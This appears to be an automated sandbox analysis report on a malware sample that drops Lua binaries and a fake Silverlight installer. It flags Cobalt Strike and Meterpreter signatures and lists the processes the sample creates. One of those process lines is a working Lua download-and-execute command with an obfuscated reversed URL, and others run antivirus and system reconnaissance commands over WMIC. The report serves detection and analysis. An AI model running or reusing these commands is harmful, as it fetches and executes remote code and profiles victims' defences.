Code function: 6_2_0100369A OpenEventA,WaitForSingleObject,CloseHandle,Sleep,LoadLibraryA,GetProcAddress,WaitForSingleObject,GetLastError,InitiateSystemShutdownA,GetLastError,WaitForSingleObject,GetLastError,_snprintf,GetVersionExA,GetVersionExA,GetVersionExA,GetSystemDirectoryA,strchr,CreateFileA,FlushFileBuffers,CloseHandle,NtShutdownSystem,FreeLibrary,

6_2_0100369A

Source: C:\ProgramData\lua\luac.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Jump to behavior

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF7365C4	1_2_00007FF7BF7365C4
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF6785A0	1_2_00007FF7BF6785A0
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF674507	1_2_00007FF7BF674507
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF672B68	1_2_00007FF7BF672B68
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF672BE6	1_2_00007FF7BF672BE6
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF682030	1_2_00007FF7BF682030
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF6800F0	1_2_00007FF7BF6800F0
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF72B090	1_2_00007FF7BF72B090
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF719FC0	1_2_00007FF7BF719FC0
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF75C7E0	1_2_00007FF7BF75C7E0
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF67EE87	1_2_00007FF7BF67EE87
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF683E60	1_2_00007FF7BF683E60
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF680650	1_2_00007FF7BF680650
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF671F08	1_2_00007FF7BF671F08
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF75CE27	1_2_00007FF7BF75CE27
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF67C56B	1_2_00007FF7BF67C56B
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF681D40	1_2_00007FF7BF681D40
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF74AE04	1_2_00007FF7BF74AE04
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF684DB0	1_2_00007FF7BF684DB0
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF75B46D	1_2_00007FF7BF75B46D
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF726C00	1_2_00007FF7BF726C00
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF67C3E0	1_2_00007FF7BF67C3E0
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF728AF0	1_2_00007FF7BF728AF0
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF74B2F0	1_2_00007FF7BF74B2F0
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF68DABD	1_2_00007FF7BF68DABD
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF71B1A0	1_2_00007FF7BF71B1A0
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF720120	1_2_00007FF7BF720120
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF725140	1_2_00007FF7BF725140
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF6B01DF	1_2_00007FF7BF6B01DF
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: 1_2_00007FF7BF726160	1_2_00007FF7BF726160
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_1000E8DD	3_2_1000E8DD
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_10004520	3_2_10004520
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_1000E140	3_2_1000E140
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_1000E9BA	3_2_1000E9BA
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_1000E640	3_2_1000E640
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_1000DB00	3_2_1000DB00
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_1000EB41	3_2_1000EB41
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_1000E7E9	3_2_1000E7E9
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_1000DFF4	3_2_1000DFF4
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01004B0F	6_2_01004B0F
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01008A0E	6_2_01008A0E
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01008210	6_2_01008210
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01008653	6_2_01008653
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01007E58	6_2_01007E58
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_010077ED	6_2_010077ED
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01007AFD	6_2_01007AFD
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01004B0F	6_2_01004B0F
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010929D0	11_2_010929D0
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_01098C10	11_2_01098C10
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_0108E880	11_2_0108E880
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010982B0	11_2_010982B0
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010942D0	11_2_010942D0
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_01091110	11_2_01091110
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010AB593	11_2_010AB593
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_0109F9D9	11_2_0109F9D9
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_0109D810	11_2_0109D810
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010AC021	11_2_010AC021
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010A4073	11_2_010A4073
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010970F0	11_2_010970F0
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_01096B30	11_2_01096B30
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_0109A370	11_2_0109A370
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_0108F780	11_2_0108F780
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010993B0	11_2_010993B0
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010AD3F1	11_2_010AD3F1
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010ABADA	11_2_010ABADA
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010986E0	11_2_010986E0
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010AC6E6	11_2_010AC6E6
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_00225BF2	19_2_00225BF2
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_0022C161	19_2_0022C161
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_0022AA74	19_2_0022AA74
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_0022E2B1	19_2_0022E2B1
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_0022DB35	19_2_0022DB35
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_0022CF68	19_2_0022CF68
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_0022AFE4	19_2_0022AFE4
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C384B3	24_2_00C384B3
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C35470	24_2_00C35470
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C3321E	24_2_00C3321E
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C3BF62	24_2_00C3BF62
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CD6630	36_2_00CD6630
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00D01050	36_2_00D01050
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF782B	36_2_00CF782B
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00D0098B	36_2_00D0098B
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF7136	36_2_00CF7136
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF2AD0	36_2_00CF2AD0
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF5CEE	36_2_00CF5CEE
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00D00444	36_2_00D00444
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CFF5A7	36_2_00CFF5A7
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00D01D5B	36_2_00D01D5B
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CE0D10	36_2_00CE0D10
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CFFEFD	36_2_00CFFEFD
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF963E	36_2_00CF963E

Source: C:\ProgramData\lua\luac.exe	Code function: String function: 1000F230 appears 47 times
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Code function: String function: 00007FF7BF75A240 appears 86 times
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: String function: 00CF2A70 appears 32 times
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: String function: 01093CE0 appears 90 times

Source: WhQZ6UbCEY.exe	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: DefaultPack[1].EXE.19.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 2985051 bytes, 7 files
Source: DefaultPack.EXE.19.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 2985051 bytes, 7 files

Source: lua.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: luac.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: luac.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DefaultPack[1].EXE.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DefaultPack[1].EXE.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DefaultPack[1].EXE.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DefaultPack.EXE.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DefaultPack.EXE.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DefaultPack.EXE.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: WhQZ6UbCEY.exe, 00000001.00000003.212382073.00000246AFA11000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewlua5.1.exe^ vs WhQZ6UbCEY.exe
Source: WhQZ6UbCEY.exe, 00000001.00000003.212343684.00000246AF9F3000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamelua5.1.dll^ vs WhQZ6UbCEY.exe

Source: C:\5a70dbc53fcf0baade86ff\install.exe	Section loaded: install.res.dll	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Section loaded: tsappcmp.dll	Jump to behavior

Source: 00000003.00000002.482412566.000000000048A000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.487308738.0000000000A50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2019-08-16, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000003.00000002.492478828.0000000001FA0000.00000004.00000040.sdmp, type: MEMORY	Matched rule: CobaltStrike_C2_Decoded_Config_Indicator date = 2019-08-16, author = yara@s3c.za.net, description = Detects CobaltStrike C2 decoded profile configuration
Source: 00000003.00000002.486483728.00000000008EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Beacon_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, type: MEMORY	Matched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2019-08-16, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: Silverlight.exe.1.dr

Static PE information: Section: .rsrc ZLIB complexity 1.00002924527

Source: classification engine

Classification label: mal56.troj.spyw.evad.winEXE@227/1060@8/4

Source: C:\ProgramData\lua\luac.exe

Code function: 3_2_00A21080 GetLastError,FormatMessageA,lua_pushstring,lua_pushfstring,

3_2_00A21080

Source: C:\Users\user\AppData\Roaming\Silverlight.exe

Code function: 6_2_01004B0F InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,FindCloseChangeNotification,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,CreateFileA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,CreateFileA,InitializeCriticalSectionAndSpinCount,#17,GetProcessHeap,CreateEventA,CreateEventA,CreateEventA,CreateThread,WaitForSingleObject,SendDlgItemMessageA,Sleep,ShowWindow,SetParent,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,LoadStringA,LoadStringA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,ShowWindow,CreateFileA,GetFileSize,ReadFile,CloseHandle,DeleteFileA,SendDlgItemMessageA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateProcessA,ShowWindow,WaitForSingleObject,GetExitCodeProcess,CloseHandle,ShowWindow,LoadStringA,MessageBoxA,DeleteCriticalSection,ExitProcess,

6_2_01004B0F

Source: C:\5a70dbc53fcf0baade86ff\install.exe

Code function: 11_2_01089F10 SysAllocString,CoCreateInstance,__itow_s,__itow_s,__itow_s,SysFreeString,

11_2_01089F10

Source: C:\5a70dbc53fcf0baade86ff\install.exe

Code function: 11_2_0108C7A0 GetWindowLongW,FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,FreeResource,GlobalFree,FreeResource,CreateStreamOnHGlobal,GlobalUnlock,GlobalFree,FreeResource,

11_2_0108C7A0

Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe

File created: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\mscorlib.ni.dll

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

File created: C:\Users\user\AppData\Roaming\Silverlight.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6524:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7156:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6224:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5596:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4772:120:WilError_01

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

File created: C:\Users\user\AppData\Local\Temp\lua.zip

Jump to behavior

Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Command line argument: dhp=true	19_2_002216B0
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Command line argument: dsp=true	19_2_002216B0
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Command line argument: dhp=false	19_2_002216B0
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Command line argument: dsp=false	19_2_002216B0
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Command line argument: dhp=true	19_2_002216B0
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Command line argument: dsp=true	19_2_002216B0
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Command line argument: TU#	19_2_002216B0
Source: C:\Windows\Installer\MSIE4C1.tmp	Command line argument: kernel32	24_2_00C32540
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Command line argument: kernel32	36_2_00CD6010
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Command line argument: -enableUpdater	36_2_00CD6010
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Command line argument: -enableMU	36_2_00CD6010
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Command line argument: -autoUpdate	36_2_00CD6010
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Command line argument: -promptDRM	36_2_00CD6010
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Command line argument: -registerApp	36_2_00CD6010
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Command line argument: -unregisterApp	36_2_00CD6010
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Command line argument: -uninstallApp	36_2_00CD6010
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Command line argument: -launchApp	36_2_00CD6010

Source: WhQZ6UbCEY.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Section loaded: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\mscorlib.dll
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Section loaded: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\mscorlib.dll
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Section loaded: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\mscorlib.ni.dll

Source: C:\5a70dbc53fcf0baade86ff\install.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\lua\lua.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\lua\lua.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\5a70dbc53fcf0baade86ff\install.exe

Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\SLMSPRBootstrap.dll',SetupPlayReadyData

Source: WhQZ6UbCEY.exe	Metadefender: Detection: 17%
Source: WhQZ6UbCEY.exe	ReversingLabs: Detection: 30%

Source: install.exe	String found in binary or memory: ist bereits installiert.=Die Upgraderichtlinie blockiert die Silverlight-Installation.<Eine 64-Bit-Version von Silverlight ist be
Source: install.exe	String found in binary or memory: r att anpassa Silverlight-installationen: /q : Tyst installationslge. /qu : Tyst
Source: install.exe	String found in binary or memory: lerad.8Uppgraderingsprincip blockerar Silverlight-installation.9En 64-bitars version av Silverlight r redan installerad.BDitt ope
Source: install.exe	String found in binary or memory: lgende alternativer for tilpasse Silverlight-installasjonen: /q : Stille installasjonsmodus. /qu
Source: install.exe	String found in binary or memory: : Stille avinstallasjonsmodus. /? : Vis dialogboksen om bruk.+Bruk av Silverlight-install
Source: install.exe	String found in binary or memory: lgende indstillinger til at tilpasse Silverlight-installationen: /q : Installation uden brugerinput. /qu
Source: install.exe	String found in binary or memory: Verwenden Sie die folgenden Optionen, um die Silverlight-Installation anzupassen: /q : Unbeaufsichtigte I
Source: Silverlight.Configuration.exe	String found in binary or memory: -launchApp
Source: Silverlight.Configuration.exe	String found in binary or memory: -installtrustedApp

Source: unknown	Process created: C:\Users\user\Desktop\WhQZ6UbCEY.exe 'C:\Users\user\Desktop\WhQZ6UbCEY.exe'
Source: unknown	Process created: C:\ProgramData\lua\luac.exe C:\ProgramData\lua\luac.exe -e 'code = \'local http=require('socket.http');\'..\'local response_body = {}\'..\'local res, code = http.request({\'..\' url = string.reverse('aul.344-SC-1/68x/moc.scnuyila.gnokgnoh-nc-sso.sbilaul//:ptth'),\'..\' sink = ltn12.sink.table(response_body)\'..\'})\'..\'if type(response_body) == 'table' then\'..\' loadstring(table.concat(response_body))()\'..\'else\'..\' print('error')\'..\'end\';loadstring(code)();'
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Silverlight.exe C:\Users\user\AppData\Roaming\Silverlight.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr LISTEN
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Process created: C:\5a70dbc53fcf0baade86ff\install.exe c:\5a70dbc53fcf0baade86ff\install.exe
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr LISTEN
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe 'C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe' dhp=true dsp=true
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC os get caption
